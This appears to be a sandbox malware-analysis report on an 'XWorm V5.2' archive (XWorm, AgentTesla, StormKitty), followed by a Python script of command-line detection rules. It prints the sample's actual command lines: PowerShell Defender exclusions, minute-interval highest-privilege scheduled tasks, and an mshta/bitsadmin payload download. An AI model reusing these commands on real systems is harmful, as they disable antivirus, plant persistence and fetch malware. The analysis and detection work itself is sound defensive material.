Analysis Overview
SHA256
3e9a0998c2f1af74e4055ac67035f3db0212901ed273278dfcea9015f4deaa5b
Threat Level: Known bad
The file XWorm V5.2.zip was found to be: Known bad.
Malicious Activity Summary
Agenttesla family
AgentTesla payload
Stormkitty family
Contains code to disable Windows Defender
Xworm family
Detect Xworm Payload
StormKitty payload
Xworm
Command and Scripting Interpreter: PowerShell
Download via BitsAdmin
Drops startup file
Checks computer location settings
Executes dropped EXE
Obfuscated with Agile.Net obfuscator
Looks up external IP address via web service
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Drops file in System32 directory
System Location Discovery: System Language Discovery
Browser Information Discovery
Enumerates physical storage devices
Unsigned PE
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious behavior: GetForegroundWindowSpam
Uses Task Scheduler COM API
Suspicious use of SendNotifyMessage
Scheduled Task/Job: Scheduled Task
Modifies data under HKEY_USERS
Modifies registry class
Enumerates system info in registry
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
Gathers network information
Checks SCSI registry key(s)
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-08-02 23:24
Signatures
AgentTesla payload
2 matches (indicator details not included in the export)
Agenttesla family
Contains code to disable Windows Defender
2 matches (indicator details not included in the export)
Detect Xworm Payload
4 matches (indicator details not included in the export)
StormKitty payload
2 matches (indicator details not included in the export)
Stormkitty family
Xworm family
Obfuscated with Agile.Net obfuscator
1 match (indicator details not included in the export)
Unsigned PE
117 matches (indicator details not included in the export)
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-02 23:23
Reported
2024-08-02 23:35
Platform
win7-20240708-en
Max time kernel
359s
Max time network
363s
Command Line
Signatures
None recorded. The only process in this run is Explorer opening the archive (below); no payload was executed on the Windows 7 image, so the empty result is not evidence that the sample is benign.
Processes
C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.zip"
Network
None recorded.
Files
None recorded.
Analysis: behavioral2
Detonation Overview
Submitted
2024-08-02 23:23
Reported
2024-08-02 23:40
Platform
win10v2004-20240802-en
Max time kernel
834s
Max time network
673s
Command Line
Signatures
Detect Xworm Payload
5 matches (indicator details not included in the export)
Xworm
Command and Scripting Interpreter: PowerShell
12 matches, all from C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (the twelve Add-MpPreference invocations in the process list; no further detail in the export)
Download via BitsAdmin
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\XClient.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk | C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\XClient.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk | C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\XClient.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk | C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\Icons\XClient.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\q11111.lnk | C:\Users\Admin\AppData\Roaming\XClient.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\q11111.lnk | C:\Users\Admin\AppData\Roaming\XClient.exe | N/A |
Executes dropped EXE
| Process | Executions |
| C:\Users\Admin\AppData\Roaming\XClient.exe | 1 |
| C:\Users\Admin\AppData\Roaming\Output.exe | 1 |
| C:\ProgramData\XClient.exe | 10 |
| C:\Users\Public\q11111 | 9 |
The repeated launches of C:\ProgramData\XClient.exe and C:\Users\Public\q11111 match the scheduled tasks created with /sc minute /mo 1 (see the process list below), which relaunch their payload once a minute for the rest of the run. Note that q11111 is an executable dropped without a file extension.
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\AppData\\Roaming\\XClient.exe" | C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\XClient.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\ProgramData\\XClient.exe" | C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\Icons\XClient.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\q11111 = "C:\\Users\\Public\\q11111" | C:\Users\Admin\AppData\Roaming\XClient.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File created | \??\c:\windows\system32\driverstore\filerepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Both hits are chrome.exe writing a precompiled INF cache file (.PNF) into the driver store, ordinary browser activity on the analysis VM. The other chrome.exe-only signatures in this run (BIOS values read from the registry, the TPM telemetry key under HKEY_USERS, NtCreateUserProcessBlockNonMicrosoftBinary) are the same kind of noise and should not be attributed to the sample.
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\NETSTAT.EXE | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\XClient.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\Icons\XClient.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\XClient.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\XClient.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\Icons\XClient.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\XClient.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.zip"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /0
C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\XClient.exe
"C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\XClient.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\XClient.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\Icons\XClient.exe
"C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\Icons\XClient.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\Icons\XClient.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\XClient.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\ProgramData\XClient.exe"
C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\Icons\XClient.exe
"C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\Icons\XClient.exe"
C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\Icons\Outfuytftjgfuyjput.exe
"C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\Icons\Outfuytftjgfuyjput.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\ProgramData\XClient.exe
C:\ProgramData\XClient.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\q11111'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'q11111'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "q11111" /tr "C:\Users\Public\q11111"
C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\Icons\Output.exe
"C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\Icons\Output.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\bitsadmin.exe
"C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com/XClient.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\Icons\XClient.exe
"C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\Icons\XClient.exe"
C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\Icons\XClient.exe
"C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\Icons\XClient.exe"
C:\ProgramData\XClient.exe
C:\ProgramData\XClient.exe
C:\Users\Public\q11111
C:\Users\Public\q11111
C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\Icons\XClient.exe
"C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\Icons\XClient.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcde01cc40,0x7ffcde01cc4c,0x7ffcde01cc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1824,i,3870977664814529505,9315824726801981298,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=1820 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2148,i,3870977664814529505,9315824726801981298,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=2172 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2316,i,3870977664814529505,9315824726801981298,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=2544 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3160,i,3870977664814529505,9315824726801981298,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3180 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3352,i,3870977664814529505,9315824726801981298,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3372 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4536,i,3870977664814529505,9315824726801981298,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4520 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4796,i,3870977664814529505,9315824726801981298,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4944 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4948,i,3870977664814529505,9315824726801981298,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4944 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=3812,i,3870977664814529505,9315824726801981298,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5008 /prefetch:1
C:\ProgramData\XClient.exe
C:\ProgramData\XClient.exe
C:\Users\Public\q11111
C:\Users\Public\q11111
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
C:\Windows\system32\ipconfig.exe
ipconfig
C:\ProgramData\XClient.exe
C:\ProgramData\XClient.exe
C:\Users\Public\q11111
C:\Users\Public\q11111
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4076,i,3870977664814529505,9315824726801981298,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4040 /prefetch:8
C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\Icons\XClient.exe
"C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\Icons\XClient.exe"
C:\ProgramData\XClient.exe
C:\ProgramData\XClient.exe
C:\Users\Public\q11111
C:\Users\Public\q11111
C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\XClient.exe
"C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\XClient.exe"
C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\XClient.exe
"C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\XClient.exe"
C:\ProgramData\XClient.exe
C:\ProgramData\XClient.exe
C:\Users\Public\q11111
C:\Users\Public\q11111
C:\Windows\system32\ipconfig.exe
ipconfig /all
C:\ProgramData\XClient.exe
C:\ProgramData\XClient.exe
C:\Users\Public\q11111
C:\Users\Public\q11111
C:\ProgramData\XClient.exe
C:\ProgramData\XClient.exe
C:\Users\Public\q11111
C:\Users\Public\q11111
C:\Windows\system32\NETSTAT.EXE
netstat -a
C:\ProgramData\XClient.exe
C:\ProgramData\XClient.exe
C:\Users\Public\q11111
C:\Users\Public\q11111
C:\ProgramData\XClient.exe
C:\ProgramData\XClient.exe
C:\Users\Public\q11111
C:\Users\Public\q11111
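The process list above shows the sample's evasion and persistence chain in plain command lines: Defender exclusions carved with Add-MpPreference under -ExecutionPolicy Bypass (the basis of the "Contains code to disable Windows Defender" signature), schtasks /create tasks at highest run level firing every minute, an .hta run through mshta that hands off to bitsadmin for the download, and an extensionless payload launched from C:\Users\Public. The detection logic below is an added example, not part of the sandbox report: it encodes those patterns as rules and runs them over the command lines above plus three constructed benign lines, so the rules can be checked for false positives. The Set-MpPreference -Disable* pattern is a generalisation this sample did not use, and the rule names and ATT&CK mappings are this example's own.

```python
"""Command-line detections for the evasion and persistence steps visible in
the process tree above (added example; not part of the sandbox report)."""
import re

# Constructed sample input: process-creation command lines copied from the
# behavioral2 process tree, followed by three benign lines that must not fire.
SAMPLE_EVENTS = r'''
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'q11111'
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\ProgramData\XClient.exe"
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "q11111" /tr "C:\Users\Public\q11111"
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
"C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com/XClient.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
C:\Users\Public\q11111
C:\ProgramData\XClient.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1
"C:\Windows\System32\schtasks.exe" /create /sc daily /tn "Backup" /tr "C:\Program Files\Backup\backup.exe"
ipconfig /all
'''.strip().splitlines()

RULES = {
    # T1562.001: exclusions carved for the payload path and name (what the
    # report labels "Contains code to disable Windows Defender").
    # Set-MpPreference -Disable* is added as the obvious sibling; unused here.
    "defender_tamper": re.compile(
        r'\b(Add-MpPreference\s+-Exclusion(Path|Process|Extension)\b'
        r'|Set-MpPreference\s+-Disable\w+)', re.I),
    # T1197: BITS pulling a payload from an HTTP(S) URL
    "bits_download": re.compile(
        r'\bbitsadmin(\.exe)?"?\s+/transfer\b.*\bhttps?://', re.I),
    # T1218.005: mshta running an .hta out of a user profile directory
    "mshta_user_hta": re.compile(
        r'\bmshta(\.exe)?"?\s+"?[a-z]:\\Users\\[^"]+\.hta\b', re.I),
    # T1059.001: policy bypass; too common to alert on alone (see classify)
    "ps_bypass": re.compile(
        r'\bpowershell(\.exe)?"?\s+.*-ExecutionPolicy\s+Bypass\b', re.I),
}

SCHTASKS_CREATE = re.compile(r'\bschtasks(\.exe)?"?\s+/create\b', re.I)
TRUSTED_DIRS = re.compile(r'[a-z]:\\(Windows|Program Files)\\', re.I)
# A bare image path under a world-writable directory, e.g. C:\Users\Public\q11111
BARE_PUBLIC_IMAGE = re.compile(
    r'^"?([a-z]:\\(?:Users\\Public|ProgramData)\\[^\\"]+?)"?\s*$', re.I)


def schtasks_findings(cmd):
    """T1053.005: flag a /create with a trigger of five minutes or less,
    /RL HIGHEST, or a /tr target outside Windows and Program Files."""
    if not SCHTASKS_CREATE.search(cmd):
        return []
    low = cmd.lower()
    found = []
    mo = re.search(r'/mo\s+(\d+)', low)
    if '/sc minute' in low and mo and int(mo.group(1)) <= 5:
        found.append("task_minute_cadence")
    if re.search(r'/rl\s+highest', low):
        found.append("task_highest_runlevel")
    tr = re.search(r'/tr\s+"?([^"]+)', cmd, re.I)
    if tr and not TRUSTED_DIRS.match(tr.group(1).strip()):
        found.append("task_user_writable_target")
    return found


def extensionless_public_image(cmd):
    m = BARE_PUBLIC_IMAGE.match(cmd)
    return bool(m) and "." not in m.group(1).rsplit("\\", 1)[-1]


def classify(cmd):
    """Return the rule names a single command line triggers."""
    hits = [name for name, rx in RULES.items() if rx.search(cmd)]
    hits += schtasks_findings(cmd)
    if extensionless_public_image(cmd):
        hits.append("extensionless_binary_in_public_dir")
    # -ExecutionPolicy Bypass is kept only as context for another finding.
    return [] if hits == ["ps_bypass"] else hits


def scan(cmdlines):
    """Map rule name -> matching command lines over a batch of events."""
    out = {}
    for cmd in cmdlines:
        for name in classify(cmd):
            out.setdefault(name, []).append(cmd)
    return out


if __name__ == "__main__":
    for name, cmds in scan(SAMPLE_EVENTS).items():
        print(f"{name}: {len(cmds)}")
        for c in cmds:
            print("   ", c[:100])
```

Feed it the CommandLine field of Sysmon event 1 or Security event 4688. ps_bypass is deliberately context only, because -ExecutionPolicy Bypass on its own is everywhere in legitimate admin tooling; the Defender, task and mshta rules are the ones worth paging on.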
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| N/A | 127.0.0.1:7000 | tcp | |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 127.0.0.1:7000 | tcp | |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
